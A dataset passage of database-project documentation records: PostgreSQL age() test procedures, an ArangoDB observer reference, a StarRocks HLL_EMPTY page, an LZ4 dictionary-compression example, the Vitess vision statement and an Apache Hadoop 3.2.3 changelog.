'||maxts::text||' | mints: '||mints::text; return next; end; $body$; ``` Test it first with a modest number of attempts: ```plpgsql select z from randomtestreportformodeled_age(1000); ``` Then increase the number of attempts to, say, one million. This takes about a minute. (No thought was given to make the test run faster. Its speed is uninteresting.) You'll see that \"No failures\" is reported and that the range of randomly generated timestamp values spans close to the maximum that randomtimestamp() can produce (4700 BC through 4700 AD). This should give you a very high confidence indeed that the function modeledage()_ lives up to its name. The effect of age(t) is identical to the effect of age(\\<midnight today\\>, t). Here's a demonstration of the semantics. The expression datetrunc('day', clocktimestamp()) is copied from the definition of today() in the subsection . Do this to test this assertion for the timestamptz overloads: ```plpgsql drop procedure if exists assertoneparameteroverloadofagesemantics(timestamptz) cascade; create procedure assertoneparameteroverloadofagesemantics(t in timestamptz) language plpgsql as $body$ declare age_1 constant interval not null := age(t); age2 constant interval not null := age(datetrunc('day', clock_timestamp()), t); begin assert age1 = age2, 'Assert failed'; end; $body$; set timezone = 'UTC'; call assertoneparameteroverloadofagesemantics('2007-06-24'); call assertoneparameteroverloadofagesemantics('2051-07-19 Europe/Helsinki'); call assertoneparameteroverloadofagesemantics('2007-02-01 13:42:19.12345'); call assertoneparameteroverloadofagesemantics(clock_timestamp()); set timezone = 'America/Los_Angeles'; call assertoneparameteroverloadofagesemantics('2007-06-24'); call assertoneparameteroverloadofagesemantics('2051-07-19 Europe/Helsinki'); call assertoneparameteroverloadofagesemantics('2007-02-01 13:42:19.12345'); call assertoneparameteroverloadofagesemantics(clock_timestamp()); ``` Each call statement finishes without error, showing that the assertion holds for every test Do this to test this assertion for the plain timestamp overloads: ```plpgsql drop procedure if exists assertoneparameteroverloadofagesemantics(timestamp) cascade; create procedure assertoneparameteroverloadofagesemantics(t in timestamp) language plpgsql as $body$ declare age_1 constant interval not null := age(t); age2 constant interval not null := age(datetrunc('day', localtimestamp), t); begin assert age1 = age2, 'Assert failed'; end; $body$; set timezone = 'UTC'; call assertoneparameteroverloadofagesemantics('2007-02-01 13:42:19.12345'); call assertoneparameteroverloadofagesemantics('2007-06-24'); call assertoneparameteroverloadofagesemantics('2051-07-19'); call assertoneparameteroverloadofagesemantics(clock_timestamp()); set timezone = 'America/Los_Angeles'; call assertoneparameteroverloadofagesemantics('2007-02-01 13:42:19.12345'); call assertoneparameteroverloadofagesemantics('2007-06-24'); call assertoneparameteroverloadofagesemantics('2051-07-19'); call assertoneparameteroverloadofagesemantics(clock_timestamp()); ``` Each call statement finishes without error, showing that the assertion holds for every test." } ]
{ "category": "App Definition and Development", "file_name": "value.md", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "+++ title = \"`static auto &&_value(Impl &&) noexcept`\" description = \"Returns a reference to the value in the implementation passed in. Constexpr, never throws.\" categories = [\"observers\"] weight = 250 +++ Returns a reference to the value in the implementation passed in. No checking is done to ensure there is a value. Constexpr where possible. Requires: Always available. Complexity: Constant time. Guarantees: Never throws an exception." } ]
{ "category": "App Definition and Development", "file_name": "hll_empty.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" Generates an empty HLL column to supplement the default values when inserting or loading data. ```Haskell HLL_EMPTY() ``` Returns an empty HLL. Supplement the default values when inserting data. ```plain text insert into hllDemo(k1,v1) values(10,hll_empty()); ``` Supplement the default values when loading data. ```plain text curl --location-trusted -u <username>:<password> \\ -H \"columns: temp1, temp2, col1=hllhash(temp1), col2=hllempty()\" \\ -T example7.csv -XPUT \\ http://<fehost>:<fehttpport>/api/testdb/table7/streamload ```" } ]
{ "category": "App Definition and Development", "file_name": "dictionaryRandomAccess.md", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "`dictionaryRandomAccess.c` is LZ4 API example which implements dictionary compression and random access decompression. Please note that the output file is not compatible with lz4frame and is platform dependent. Dictionary based compression for homogenous files. Random access to compressed blocks. Reads the dictionary from a file, and uses it as the history for each block. This allows each block to be independent, but maintains compression ratio. ``` Dictionary | v ++ | Block#1 | +-+-+ | v {Out#1} Dictionary | v ++ | Block#2 | +-+-+ | v {Out#2} ``` After writing the magic bytes `TEST` and then the compressed blocks, write out the jump table. The last 4 bytes is an integer containing the number of blocks in the stream. If there are `N` blocks, then just before the last 4 bytes is `N + 1` 4 byte integers containing the offsets at the beginning and end of each block. Let `Offset#K` be the total number of bytes written after writing out `Block#K` including the magic bytes for simplicity. ``` +++ +++-+ +-+--+ | TEST | Block#1 | ... | Block#N | 4 | Offset#1 | ... | Offset#N | N+1 | +++ +++-+ +-+--+ ``` Decompression will do reverse order. Seek to the last 4 bytes of the file and read the number of offsets. Read each offset into an array. Seek to the first block containing data we want to read. We know where to look because we know each block contains a fixed amount of uncompressed data, except possibly the last. Decompress it and write what data we need from it to the file. Read the next block. Decompress it and write that page to the file. Continue these procedure until all the required data has been read." } ]
{ "category": "App Definition and Development", "file_name": "Vision.md", "project_name": "Vitess", "subcategory": "Database" }
[ { "data": "MySQL is an easy relational database to get started with. It's easy to setup and has a short learning curve. However, as your system starts to scale, it begins to run out of steam. This is mainly because it's non-trivial to shard a MySQL database after the fact. Among other problems, the growing number of connections also becomes an unbearable overhead. On the other end of the spectrum, there are NoSQL databases. However, they suffer from problems that mainly stem from the fact that they're new. Those who have adopted them have struggled with the lack of secondary indexes, table joins and transactions. Vitess tries to bring the best of both worlds by trading off some of MySQL's consistency features in order to achieve the kind of scalability that NoSQL databases provide. Scalability*: This is achieved by replication and sharding. Efficiency*: This is achieved by a proxy server (vttablet) that multiplexes queries into a fixed-size connection pool, and rewrites updates by primary key to speed up slave applier threads. Manageability*: As soon as you add replication and sharding that span across multiple data centers, the number of servers spirals out of control. Vitess provides a set of tools backed by a lockserver (zookeeper) to track and administer them. Simplicity*: As the complexity grows, it's important to hide this from the application. The vtgate servers give you a unified view of the fleet that makes it feel like you're just interacting with one database. Scalability and availability require some trade-offs: Consistency*: In a typical web application, not all reads have to be fully consistent. Vitess lets you specify the kind of consistency you want on your read. It's generally recommended that you use replica reads as they're easier to scale. You can always request for primary reads if you want up-to-date data. You can also additionally perform 'for update' reads that ensure that a row will not change until you've committed your changes. Transactions*: Relational transactions are prohibitively expensive across distributed systems. Vitess eases this constraint and guarantees transactional integrity 'per keyspace id', which is restricted to one shard. Heuristically, this tends to cover most of an application's transactions. For the few cases that don't, you can sequence your changes in such a way that the system looks consistent even if a distributed transaction fails in the middle. Latency*: There is some negligible latency introduced by the proxy servers. However, they make up for the fact that you can extract more throughput from MySQL than you would otherwise be able to without them. Since the underlying storage layer is still MySQL, we still get to preserve its other important features: Indexes*: You can create secondary indexes on your tables. This allows you to efficiently query rows using more than one key. Joins*: MySQL allows you to split one-to-many and many-to-many relational data into separate tables, and lets you join them on demand. This flexibility generally results in more efficient storage as each piece of data is stored only once, and fetched only if needed. The following diagram illustrates where vitess fits in the spectrum of storage solutions:" } ]
{ "category": "App Definition and Development", "file_name": "CHANGELOG.3.2.3.md", "project_name": "Apache Hadoop", "subcategory": "Database" }
[ { "data": "<! --> | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Add PathCapabilities to FS and FC to complement StreamCapabilities | Major | . | Steve Loughran | Steve Loughran | | | Add Metrics to HttpFS Server | Major | httpfs | Ahmed Hussein | Ahmed Hussein | | | EC: Verify EC reconstruction correctness on DataNode | Major | datanode, ec, erasure-coding | Toshihiko Uchida | Toshihiko Uchida | | | Show start time of Datanode on Web | Minor | . | tomscut | tomscut | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Remove Subversion and Forrest from Dockerfile | Minor | build | Akira Ajisaka | Xieming Li | | | Remove low-level zookeeper test to be able to build Hadoop against zookeeper 3.5.5 | Major | test | Mate Szalay-Beko | Mate Szalay-Beko | | | Remove GenericsUtil isLog4jLogger dependency on Log4jLoggerAdapter | Major | . | David Mollitor | Xieming Li | | | Install yarnpkg and upgrade nodejs in Dockerfile | Major | buid, yarn-ui-v2 | Akira Ajisaka | Akira Ajisaka | | | Use JUnit TemporaryFolder Rule in TestFileUtils | Minor | common, test | David Mollitor | David Mollitor | | | Remove process command timing from BPServiceActor | Major | . | igo Goiri | Xiaoqiao He | | | Update Dockerfile to use Bionic | Major | build, test | Akira Ajisaka | Akira Ajisaka | | | Remove unnecessary sort of block list in DirectoryScanner | Major | . | Stephen O'Donnell | Stephen O'Donnell | | | Backport DirectoryScanner improvements HDFS-14476, HDFS-14751 and HDFS-15048 to branch 3.2 and 3.1 | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | [SBN Read] HDFS should expose msync() API to allow downstream applications call it explicitly. | Major | ha, hdfs-client | Konstantin Shvachko | Konstantin Shvachko | | | Avoid redundant RPC calls for getDiskStatus | Major | dfsclient | Ayush Saxena | Ayush Saxena | | | Add cpu and memory utilization per node and cluster-wide metrics | Minor | yarn | Jim Brennan | Jim Brennan | | | Make block size from NNThroughputBenchmark configurable | Minor | benchmarks | Hui Fei | Hui Fei | | | Scale RM-NM heartbeat interval based on node utilization | Minor | yarn | Jim Brennan | Jim Brennan | | | Balancer logging improvement | Major | balancer & mover | Konstantin Shvachko | Konstantin Shvachko | | | Creating a token identifier should not do kerberos name resolution | Major | common | Jim Brennan | Jim Brennan | | | RMProxy should retry on SocketTimeout Exceptions | Major | yarn | Jim Brennan | Jim Brennan | | | Respect configured values of rpc.engine | Major | hdfs | Hector Sandoval Chaverri | Hector Sandoval Chaverri | | | Remove WARN Logging From Interrupts in DataStreamer | Minor | hdfs-client | David Mollitor | David Mollitor | | | Add InetAddress api to ProxyUsers.authorize | Major | performance, security | Ahmed Hussein | Ahmed Hussein | | | Avoid calling UpdateHeartBeatState inside DataNodeDescriptor | Major |" }, { "data": "| Ahmed Hussein | Ahmed Hussein | | | Don't generate edits for set operations that are no-op | Major | namenode | Ahmed Hussein | Ahmed Hussein | | | Remote exception messages should not include the exception class | Major | ipc | Ahmed Hussein | Ahmed Hussein | | | HttpFS: Log more information on request failures | Major | httpfs | Ahmed Hussein | Ahmed Hussein | | | KMS should log full UGI principal | Major | . | Ahmed Hussein | Ahmed Hussein | | | namenode audit async logger should add some log4j config | Minor | hdfs | Max Xie | | | | Mitigate lease monitor's rapid infinite loop | Major | namenode | Ahmed Hussein | Ahmed Hussein | | | Add documentation for msync() API to filesystem.md | Major | documentation | Konstantin Shvachko | Konstantin Shvachko | | | Add recommissioning nodes to the list of updated nodes returned to the AM | Major | . | Srinivas S T | Srinivas S T | | | Diagnostics for localization timeouts is lacking | Major | . | Chang Li | Chang Li | | | Follow up changes for YARN-9833 | Major | yarn | Jim Brennan | Jim Brennan | | | Speed up BlockPlacementPolicyRackFaultTolerant#verifyBlockPlacement | Major | block placement | Akira Ajisaka | Akira Ajisaka | | | Improve the description of hadoop.http.authentication.signature.secret.file | Minor | documentation | Akira Ajisaka | Akira Ajisaka | | | Lease renewal does not require namesystem lock | Major | hdfs | Jim Brennan | Jim Brennan | | | Fix logging typo in ShutdownHookManager | Major | common | Konstantin Shvachko | Fengnan Li | | | Move Jenkinsfile outside of the root directory | Major | build | Akira Ajisaka | Akira Ajisaka | | | Make DisallowedDatanodeException terse | Minor | hdfs | Richard | Richard | | | DataStreamer: keep sending heartbeat packets while streaming | Major | hdfs | Jim Brennan | Jim Brennan | | | Log list of mappers at trace level in ShuffleHandler audit log | Minor | yarn | Jim Brennan | Jim Brennan | | | Add metrics for in-service datanodes | Minor | . | Zehao Chen | Zehao Chen | | | Log resource allocation in NM log at container start time | Major | . | Eric Badger | Eric Badger | | | if required storageType are unavailable, log the failed reason during choosing Datanode | Minor | block placement | Yang Yun | Yang Yun | | | Solve the problem of incorrect progress of delegation tokens when loading FsImage | Major | . | JiangHua Zhu | JiangHua Zhu | | | [READ] DirectoryScanner#scan need not check StorageType.PROVIDED | Minor | datanode | Yuxuan Wang | Yuxuan Wang | | | Add kms-default.xml and httpfs-default.xml to site index | Minor | documentation | Masatake Iwasaki | Masatake Iwasaki | | | Config to allow Intra- and Inter-queue preemption to enable/disable conservativeDRF | Minor | capacity scheduler, scheduler preemption | Eric Payne | Eric Payne | | | Fixed the findbugs issues introduced by YARN-10647. | Major | . | Qi Zhu | Qi Zhu | | | ClientHSSecurityInfo class is in wrong META-INF file | Major | . | Eric Badger | Eric Badger | | | Update Description of hadoop-http-auth-signature-secret in HttpAuthentication.md | Minor |" }, { "data": "| Ravuri Sushma sree | Ravuri Sushma sree | | | Allow parameter expansion in NM\\ADMIN\\USER\\_ENV | Major | yarn | Jim Brennan | Jim Brennan | | | Apply YETUS-1102 to re-enable GitHub comments | Major | build | Akira Ajisaka | Akira Ajisaka | | | DistCp: Expose the JobId for applications executing through run method | Major | . | Ayush Saxena | Ayush Saxena | | | Provide blocks moved count in Balancer iteration result | Major | balancer & mover | Viraj Jasani | Viraj Jasani | | | BlockPoolManager should log stack trace if unable to get Namenode addresses | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | Use spotbugs-maven-plugin instead of findbugs-maven-plugin | Major | build | Akira Ajisaka | Akira Ajisaka | | | Improve the balancer error message when process exits abnormally. | Major | . | Renukaprasad C | Renukaprasad C | | | Fix non-static inner classes for better memory management | Major | . | Viraj Jasani | Viraj Jasani | | | Increase Quota initialization threads | Major | namenode | Stephen O'Donnell | Stephen O'Donnell | | | Reduce memory used during datanode layout upgrade | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | Building native code fails on Fedora 33 | Major | build, common | Kengo Seki | Masatake Iwasaki | | | Bump json-smart to 2.4.2 and nimbus-jose-jwt to 9.8 due to CVEs | Major | auth, build | helen huang | Viraj Jasani | | | Provide source artifacts for hadoop-client-api | Major | . | Karel Kolman | Karel Kolman | | | Allow ProtobufRpcEngine to be extensible | Major | common | Hector Sandoval Chaverri | Hector Sandoval Chaverri | | | Error message around yarn app -stop/start can be improved to highlight that an implementation at framework level is needed for the stop/start functionality to work | Minor | client, documentation | Siddharth Ahuja | Siddharth Ahuja | | | Increase precommit job timeout from 20 hours to 24 hours. | Major | build | Takanobu Asanuma | Takanobu Asanuma | | | Remove redundant RPC requests for getFileLinkInfo in ClientNamenodeProtocolTranslatorPB | Minor | . | lei w | lei w | | | Remove an expensive debug string concatenation | Major | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Introduce read write lock to Datanode | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | Intra-queue preemption: apps that don't use defined custom resource won't be preempted. | Major | . | Eric Payne | Eric Payne | | | Remove lock contention in SelectorPool of SocketIOWithTimeout | Major | common | Xuesen Liang | Xuesen Liang | | | Remove JavaScript package from Docker environment | Major | build | Masatake Iwasaki | Masatake Iwasaki | | | Add a sample configuration to use ZKDelegationTokenSecretManager in Hadoop KMS | Major | documentation, kms, security | Akira Ajisaka | Akira Ajisaka | | | Document" }, { "data": "| Major | documentation | Arpit Agarwal | Akira Ajisaka | | | RM PartitionQueueMetrics records are named QueueMetrics in Simon metrics registry | Major | resourcemanager | Eric Payne | Eric Payne | | | Make the socket timeout for computing checksum of striped blocks configurable | Minor | datanode, ec, erasure-coding | Yushi Hayasaka | Yushi Hayasaka | | | [UI2] YARN-10826 breaks Queue view | Major | yarn-ui-v2 | Andras Gyori | Masatake Iwasaki | | | Make max container per heartbeat configs refreshable | Major | . | Eric Badger | Eric Badger | | | Checkstyle - Allow line length: 100 | Major | . | Akira Ajisaka | Viraj Jasani | | | Add extensions to ProtobufRpcEngine RequestHeaderProto | Major | common | Hector Sandoval Chaverri | Hector Sandoval Chaverri | | | Avoid evaluation of LOG.debug statement in QuorumJournalManager | Trivial | . | wangzhaohui | wangzhaohui | | | TestMiniJournalCluster failing intermittently because of not reseting UserGroupInformation completely | Minor | . | wangzhaohui | wangzhaohui | | | Exclude spotbugs-annotations from transitive dependencies on branch-3.2 | Major | . | Masatake Iwasaki | Masatake Iwasaki | | | Improve CopyCommands#Put#executor queue configurability | Major | fs | JiangHua Zhu | JiangHua Zhu | | | ReplicaMap, Disk Balancer, Directory Scanner and various FsDatasetImpl methods should use datanode readlock | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | BPServiceActor processes commands from NameNode asynchronously | Major | datanode | Xiaoqiao He | Xiaoqiao He | | | Standby close reconstruction thread | Major | . | zhanghuazong | zhanghuazong | | | Debug tool to verify the correctness of erasure coding on file | Minor | erasure-coding, tools | daimin | daimin | | | Allow get command to run with multi threads. | Major | fs | Chengwei Wang | Chengwei Wang | | | Allow cp command to run with multi threads. | Major | fs | Chengwei Wang | Chengwei Wang | | | WASB : Make metadata checks case insensitive | Major | . | Anoop Sam John | Anoop Sam John | | | Reduce DataNode load when FsDatasetAsyncDiskService is working | Major | datanode | JiangHua Zhu | JiangHua Zhu | | | Validate maximum blocks in EC group when adding an EC policy | Minor | ec, erasure-coding | daimin | daimin | | | Improve FUSE IO performance by supporting FUSE parameter max\\_background | Minor | fuse-dfs | daimin | daimin | | | Better exception handling for testFileStatusOnMountLink() in ViewFsBaseTest.java | Trivial | . | Xing Lin | Xing Lin | | | Refactor tests in TestFileUtil | Trivial | common | Gautham Banasandra | Gautham Banasandra | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Filter overlapping objenesis class in hadoop-client-minicluster | Minor | build | Xiaoyu Yao | Xiaoyu Yao | | | Bump up Atsv2 hbase versions | Major | . | Rohith Sharma K S | Vrushali C | | | Fix intermittent failure of TestNameNodeMetrics | Major | . | Ayush Saxena | Ayush Saxena | | | NPE when executing a command yarn node -status or -states without additional arguments | Minor | client | Masahiro Tanaka | Masahiro Tanaka | | | Timeline Server event handler threads locked | Major | ATSv2, timelineserver | Venkata Puneet Ravuri | Prabhu Joseph | | | Testcase fails with \"Insufficient configured threads: required=16 \\< max=10\" | Major | . | Prabhu Joseph | Prabhu Joseph | | | Fix build instruction of hadoop-yarn-ui | Minor | yarn-ui-v2 | Masatake Iwasaki | Masatake Iwasaki | | | Upgrade build tools for YARN Web UI v2 | Major | build, security, yarn-ui-v2 | Akira Ajisaka | Masatake Iwasaki | | | CORRUPT replica mismatch between namenodes after failover | Critical |" }, { "data": "| Ayush Saxena | Ayush Saxena | | | Delete Corrupt Replica Immediately Irrespective of Replicas On Stale Storage | Critical | . | Ayush Saxena | Ayush Saxena | | | Missing IBR when NameNode restart if open processCommand async feature | Blocker | datanode | Xiaoqiao He | Xiaoqiao He | | | EC : File write hanged when DN is shutdown by admin command. | Major | ec | Surendra Singh Lilhore | Surendra Singh Lilhore | | | SnappyCompressor test cases wrongly assume that the compressed data is always smaller than the input data | Major | io, test | zhao bo | Akira Ajisaka | | | Unable to unregister FsDatasetState MBean if DataNode is shutdown twice | Trivial | datanode | Wei-Chiu Chuang | Wei-Chiu Chuang | | | client fails forever when namenode ipaddr changed | Major | hdfs-client | Sean Chow | Sean Chow | | | TestReconstructStripedFile#testErasureCodingWorkerXmitsWeight is failing on trunk | Major | . | Hemanth Boyina | Hemanth Boyina | | | Upgrade node.js to 10.21.0 | Critical | build, yarn-ui-v2 | Akira Ajisaka | Akira Ajisaka | | | Jetty upgrade to 9.4.x causes MR app fail with IOException | Major | . | Bilwa S T | Bilwa S T | | | Fix spotbugs warnings surfaced after upgrade to 4.0.6 | Minor | . | Masatake Iwasaki | Masatake Iwasaki | | | Setting dfs.mover.retry.max.attempts to negative value will retry forever. | Major | balancer & mover | AMC-team | AMC-team | | | Log improvements in NodeStatusUpdaterImpl | Minor | nodemanager | Bilwa S T | Bilwa S T | | | Setting dfs.disk.balancer.max.disk.errors = 0 will fail the block copy | Major | balancer & mover | AMC-team | AMC-team | | | Handle null containerId in ClientRMService#getContainerReport() | Major | resourcemanager | Raghvendra Singh | Shubham Gupta | | | HttpFS server throws NPE if a file is a symlink | Major | fs, httpfs | Ahmed Hussein | Ahmed Hussein | | | Audit log deletes before collecting blocks | Major | logging, namenode | Ahmed Hussein | Ahmed Hussein | | | Javadoc warnings and errors are ignored in the precommit jobs | Major | build, documentation | Akira Ajisaka | Akira Ajisaka | | | Touch command with -c option is broken | Major | . | Ayush Saxena | Ayush Saxena | | | [JDK 11] Fix Javadoc errors in hadoop-hdfs-client | Major | . | Takanobu Asanuma | Takanobu Asanuma | | | Deleted blocks linger in the replications queue | Major | hdfs | Ahmed Hussein | Ahmed Hussein | | | DataNode could meet deadlock if invoke refreshNameNode | Critical | . | Hongbing Wang | Hongbing Wang | | | Upgrading to JUnit 4.13 causes testcase TestFetcher.testCorruptedIFile() to fail | Major | test | Peter Bacsko | Peter Bacsko | | | Failed volumes can cause DNs to stop block reporting | Major | block placement, datanode | Ahmed Hussein | Ahmed Hussein | | | Bump up snakeyaml to 1.26 to mitigate CVE-2017-18640 | Major | . | Brahma Reddy Battula | Brahma Reddy Battula | | | ContainerIdPBImpl objects can be leaked in RMNodeImpl.completedContainers | Major | resourcemanager | Haibo Chen | Haibo Chen | | | mvn site commands fails due to MetricsSystemImpl changes | Major |" }, { "data": "| Xiaoqiao He | Xiaoqiao He | | | Client could not obtain block when DN CommandProcessingThread exit | Major | . | Yiqun Lin | Mingxiang Li | | | TestLdapGroupsMapping failing -string mismatch in exception validation | Major | test | Steve Loughran | Steve Loughran | | | Update PATCH\\NAMING\\RULE in the personality file | Minor | build | Akira Ajisaka | Akira Ajisaka | | | Fix outdated properties of JournalNode when performing rollback | Minor | . | Deegue | Deegue | | | Improve excessive reloading of Configurations | Major | conf | Ahmed Hussein | Ahmed Hussein | | | Fix the documentation for dfs.namenode.replication.max-streams in hdfs-default.xml | Major | . | Xieming Li | Xieming Li | | | Doing hadoop ls on Har file triggers too many RPC calls | Major | fs | Ahmed Hussein | Ahmed Hussein | | | TimelineConnector swallows InterruptedException | Major | . | Ahmed Hussein | Ahmed Hussein | | | Log the remote address for authentication success | Minor | ipc | Ahmed Hussein | Ahmed Hussein | | | Fair call queue is defeated by abusive service principals | Major | common, ipc | Ahmed Hussein | Ahmed Hussein | | | When building new web ui with root user, the bower install should support it. | Major | build, yarn-ui-v2 | Qi Zhu | Qi Zhu | | | Fix Yarn CapacityScheduler Markdown document | Trivial | documentation | zhaoshengjie | zhaoshengjie | | | NN should not let the balancer run in safemode | Major | namenode | Ahmed Hussein | Ahmed Hussein | | | Update yarn.nodemanager.env-whitelist value in docs | Minor | documentation | Andrea Scarpino | Andrea Scarpino | | | NNTop counts don't add up as expected | Major | hdfs, metrics, namenode | Ahmed Hussein | Ahmed Hussein | | | EC: Socket file descriptor leak in StripedBlockChecksumReconstructor | Major | datanode, ec, erasure-coding | Yushi Hayasaka | Yushi Hayasaka | | | Fix deprecation warnings in SLSWebApp.java | Minor | build | Akira Ajisaka | Ankit Kumar | | | ServerSocketUtil.getPort() should use loopback address, not 0.0.0.0 | Major | . | Eric Badger | Eric Badger | | | Lease Recovery never completes for a committed block which the DNs never finalize | Major | namenode | Stephen O'Donnell | Stephen O'Donnell | | | EC: Block gets marked as CORRUPT in case of failover and pipeline recovery | Critical | erasure-coding | Ayush Saxena | Ayush Saxena | | | [Hadoop 3] Both NameNodes can crash simultaneously due to the short JN socket timeout | Critical | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Upgrade node.js to 10.23.1 and yarn to 1.22.5 in Web UI v2 | Major | webapp, yarn-ui-v2 | Akira Ajisaka | Akira Ajisaka | | | maxAMShare should only be accepted for leaf queues, not parent queues | Major | . | Siddharth Ahuja | Siddharth Ahuja | | | Increase docker memory limit in Jenkins | Major | build, scripts, test, yetus | Ahmed Hussein | Ahmed Hussein | | | Clear the fileMap in JHEventHandlerForSigtermTest | Minor | test | Zhengxi Li | Zhengxi Li | | | Stale record should be remove when MutableRollingAverages generating aggregate data. | Major | . | Haibin Huang | Haibin Huang | | | AbstractContractDeleteTest should set recursive parameter to true for recursive test cases. | Major |" }, { "data": "| Konstantin Shvachko | Anton Kutuzov | | | Intermittent test failure org.apache.hadoop.hdfs.server.namenode.snapshot.TestSnapshotFileLength.testSnapshotfileLength | Major | hdfs, snapshots | Hanisha Koneru | Jim Brennan | | | Fix typo in BUILDING.txt | Trivial | documentation | Gautham Banasandra | Gautham Banasandra | | | EC: Wrong checksum when reconstruction was failed by exception | Major | datanode, ec, erasure-coding | Yushi Hayasaka | Yushi Hayasaka | | | EC: fix NPE caused by StripedWriter.clearBuffers during reconstruct block | Major | . | Hongbing Wang | Hongbing Wang | | | EC: Reconstruct task failed, and It would be XmitsInProgress of DN has negative number | Major | . | Haiyang Hu | Haiyang Hu | | | Zombie applications in the YARN queue using FAIR + sizebasedweight | Critical | capacityscheduler | Guang Yang | Andras Gyori | | | User environment is unable to prepend PATH when mapreduce.admin.user.env also sets PATH | Major | . | Eric Badger | Eric Badger | | | Upgrade ant to 1.10.9 | Major | . | Akira Ajisaka | Akira Ajisaka | | | TestDelegationTokenRenewer fails intermittently | Major | test | Akira Ajisaka | Masatake Iwasaki | | | Upgrade Jackson databind to 2.10.5.1 | Major | build | Adam Roberts | Akira Ajisaka | | | Remove job\\history\\summary.py | Major | . | Akira Ajisaka | Akira Ajisaka | | | Fix TestRMNodeLabelsManager failed after YARN-10501. | Major | . | Qi Zhu | Qi Zhu | | | Hadoop prints sensitive Cookie information. | Major | . | Renukaprasad C | Renukaprasad C | | | Reported IBR is partially replaced with stored info when queuing. | Critical | namenode | Kihwal Lee | Stephen O'Donnell | | | CapacityScheduler crashed with NPE in AbstractYarnScheduler.updateNodeResource() | Major | . | Haibo Chen | Haibo Chen | | | ClusterMapReduceTestCase does not clean directories | Major | . | Ahmed Hussein | Ahmed Hussein | | | Skip any credentials stored in HDFS when starting ZKFC | Major | hdfs | Krzysztof Adamski | Stephen O'Donnell | | | ExpiredHeartbeats metric should be of Type.COUNTER | Major | metrics | Konstantin Shvachko | Qi Zhu | | | All testcases in TestReservations are flaky | Major | . | Szilard Nemeth | Szilard Nemeth | | | skip-dir option is not processed by Yetus | Major | build, precommit, yetus | Ahmed Hussein | Ahmed Hussein | | | Check whether file is being truncated before truncate | Major | . | Hui Fei | Hui Fei | | | Replace GitHub App Token with GitHub OAuth token | Major | build | Akira Ajisaka | Akira Ajisaka | | | Add option to disable/enable free disk space checking and percentage checking for full and not-full disks | Major | nodemanager | Qi Zhu | Qi Zhu | | | Upgrade org.codehaus.woodstox:stax2-api to 4.2.1 | Major | . | Ayush Saxena | Ayush Saxena | | | Correct timestamp format in the docs for the touch command | Major | . | Stephen O'Donnell | Stephen O'Donnell | | | Percentage of queue and cluster is zero in WebUI | Major |" }, { "data": "| Bilwa S T | Bilwa S T | | | revisiting TestMRIntermediateDataEncryption | Major | job submission, security, test | Ahmed Hussein | Ahmed Hussein | | | Fix the wrong CIDR range example in Proxy User documentation | Minor | documentation | Kwangsun Noh | Kwangsun Noh | | | Upgrade com.github.eirslett:frontend-maven-plugin to 1.11.2 | Major | buid | Mingliang Liu | Mingliang Liu | | | Intermediate data encryption is broken in LocalJobRunner | Major | job submission, security | Ahmed Hussein | Ahmed Hussein | | | Resources are displayed in bytes in UI for schedulers other than capacity | Major | . | Bilwa S T | Bilwa S T | | | Upgrade JUnit to 4.13.1 | Major | build, security, test | Ahmed Hussein | Ahmed Hussein | | | RBF: empty blockpool id on dfsrouter caused by UNAVAILABLE NameNode | Major | rbf | Harunobu Daikoku | Harunobu Daikoku | | | Can't remove all node labels after add node label without nodemanager port | Critical | yarn | caozhiqiang | caozhiqiang | | | Fix typo in ContainerRuntime | Trivial | documentation | Wanqiang Ji | xishuhai | | | Remove unused hdfs.proto import | Major | hdfs-client | Gautham Banasandra | Gautham Banasandra | | | Fix integer overflow | Major | libhdfs++ | Gautham Banasandra | Gautham Banasandra | | | Fix test4tests for libhdfspp | Critical | build, libhdfs++ | Gautham Banasandra | Gautham Banasandra | | | Fix TestKMS failure | Major | kms | Akira Ajisaka | Akira Ajisaka | | | Upgrading to JUnit 4.13 causes tests in TestNodeStatusUpdater to fail | Major | nodemanager, test | Peter Bacsko | Peter Bacsko | | | ITestWasbUriAndConfiguration.testCanonicalServiceName() failing now mockaccount exists | Minor | fs/azure, test | Steve Loughran | Steve Loughran | | | Upgrade Jetty to 9.4.40 | Blocker | . | Akira Ajisaka | Akira Ajisaka | | | Can't remove all node labels after add node label without nodemanager port, broken by YARN-10647 | Major | . | D M Murali Krishna Reddy | D M Murali Krishna Reddy | | | Datanode DirectoryScanner uses excessive memory | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | Remove additional junit 4.11 dependency from javadoc | Major | build, test, timelineservice | ANANDA G B | Akira Ajisaka | | | Missing access check before getAppAttempts | Critical | webapp | lujie | lujie | | | checkcompatibility.py errors out when specifying annotations | Major | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Build of Mapreduce Native Task module fails with unknown opcode \"bswap\" | Major | . | Anup Halarnkar | Anup Halarnkar | | | Explicitly set locale in the Dockerfile | Blocker | build | Wei-Chiu Chuang | Wei-Chiu Chuang | | | ExitUtil#halt info log should log HaltException | Major | . | Viraj Jasani | Viraj Jasani | | | container-executor permission is wrong in SecureContainer.md | Major | documentation | Akira Ajisaka | Siddharth Ahuja | | | Race condition with async edits logging due to updating txId outside of the namesystem log | Major | hdfs, namenode | Konstantin Shvachko | Konstantin Shvachko | | | RpcQueueTime metric counts requeued calls as unique events. | Major | hdfs | Simbarashe Dzinamarira | Simbarashe Dzinamarira | | | testWithHbaseConfAtHdfsFileSystem consistently failing | Major | . | Viraj Jasani | Viraj Jasani | | | Quota is not preserved in snapshot INode | Major | hdfs | Siyao Meng | Siyao Meng | | | WebHdfsFileSystem has a possible connection leak in connection with HttpFS | Major |" }, { "data": "| Takanobu Asanuma | Takanobu Asanuma | | | Yarn Logs Command retrying on Standby RM for 30 times | Major | . | D M Murali Krishna Reddy | D M Murali Krishna Reddy | | | 